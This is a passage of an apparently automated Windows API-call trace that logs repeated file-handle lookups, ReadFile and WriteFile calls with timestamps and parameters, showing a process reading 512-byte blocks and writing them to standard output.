(in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.256] GetFileType (hFile=0x50) returned 0x1 [0223.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.256] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.256] GetFileType (hFile=0x50) returned 0x1 [0223.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.256] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.256] GetFileType (hFile=0x50) returned 0x1 [0223.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.256] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.256] GetFileType (hFile=0x50) returned 0x1 [0223.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.257] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.257] GetFileType (hFile=0x50) returned 0x1 [0223.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.257] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.257] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.257] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.257] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.257] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.257] GetFileType (hFile=0x50) returned 0x1 [0223.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.257] GetFileType (hFile=0x50) returned 0x1 [0223.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.257] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.257] GetFileType (hFile=0x50) returned 0x1 [0223.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.257] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.258] GetFileType (hFile=0x50) returned 0x1 [0223.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.258] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.258] GetFileType (hFile=0x50) returned 0x1 [0223.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.258] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.258] GetFileType (hFile=0x50) returned 0x1 [0223.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.258] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.258] GetFileType (hFile=0x50) returned 0x1 [0223.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.258] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.258] GetFileType (hFile=0x50) returned 0x1 [0223.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.258] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.259] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.259] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.259] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.259] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.259] GetFileType (hFile=0x50) returned 0x1 [0223.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.259] GetFileType (hFile=0x50) returned 0x1 [0223.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.259] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.259] GetFileType (hFile=0x50) returned 0x1 [0223.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.259] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.259] GetFileType (hFile=0x50) returned 0x1 [0223.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.259] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.259] GetFileType (hFile=0x50) returned 0x1 [0223.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.260] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.260] GetFileType (hFile=0x50) returned 0x1 [0223.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.260] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.260] GetFileType (hFile=0x50) returned 0x1 [0223.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.260] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.261] GetFileType (hFile=0x50) returned 0x1 [0223.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.261] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.261] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.261] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.261] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.261] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.261] GetFileType (hFile=0x50) returned 0x1 [0223.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.261] GetFileType (hFile=0x50) returned 0x1 [0223.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.261] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.261] GetFileType (hFile=0x50) returned 0x1 [0223.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.261] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.262] GetFileType (hFile=0x50) returned 0x1 [0223.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.262] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.262] GetFileType (hFile=0x50) returned 0x1 [0223.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.262] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.262] GetFileType (hFile=0x50) returned 0x1 [0223.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.262] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.262] GetFileType (hFile=0x50) returned 0x1 [0223.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.262] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.262] GetFileType (hFile=0x50) returned 0x1 [0223.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.262] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.263] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.263] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.263] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.263] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.263] GetFileType (hFile=0x50) returned 0x1 [0223.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.263] GetFileType (hFile=0x50) returned 0x1 [0223.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.263] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.263] GetFileType (hFile=0x50) returned 0x1 [0223.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.263] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.263] GetFileType (hFile=0x50) returned 0x1 [0223.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.263] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.264] GetFileType (hFile=0x50) returned 0x1 [0223.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.264] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.264] GetFileType (hFile=0x50) returned 0x1 [0223.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.264] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.264] GetFileType (hFile=0x50) returned 0x1 [0223.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.264] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.264] GetFileType (hFile=0x50) returned 0x1 [0223.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.264] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.264] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.264] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.265] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.265] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.265] GetFileType (hFile=0x50) returned 0x1 [0223.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.265] GetFileType (hFile=0x50) returned 0x1 [0223.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.265] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.265] GetFileType (hFile=0x50) returned 0x1 [0223.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.265] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.265] GetFileType (hFile=0x50) returned 0x1 [0223.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.265] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.265] GetFileType (hFile=0x50) returned 0x1 [0223.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.265] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.265] GetFileType (hFile=0x50) returned 0x1 [0223.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.266] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.266] GetFileType (hFile=0x50) returned 0x1 [0223.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.266] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.266] GetFileType (hFile=0x50) returned 0x1 [0223.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.266] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.266] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.266] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.266] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.266] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.266] GetFileType (hFile=0x50) returned 0x1 [0223.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.266] GetFileType (hFile=0x50) returned 0x1 [0223.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.266] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.267] GetFileType (hFile=0x50) returned 0x1 [0223.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.267] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.267] GetFileType (hFile=0x50) returned 0x1 [0223.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.267] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.267] GetFileType (hFile=0x50) returned 0x1 [0223.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.267] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.267] GetFileType (hFile=0x50) returned 0x1 [0223.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.267] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.267] GetFileType (hFile=0x50) returned 0x1 [0223.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.267] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.268] GetFileType (hFile=0x50) returned 0x1 [0223.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.268] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.268] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.268] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.268] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.268] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.268] GetFileType (hFile=0x50) returned 0x1 [0223.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.268] GetFileType (hFile=0x50) returned 0x1 [0223.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.268] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.268] GetFileType (hFile=0x50) returned 0x1 [0223.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.268] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.268] GetFileType (hFile=0x50) returned 0x1 [0223.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.268] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.269] GetFileType (hFile=0x50) returned 0x1 [0223.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.269] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, 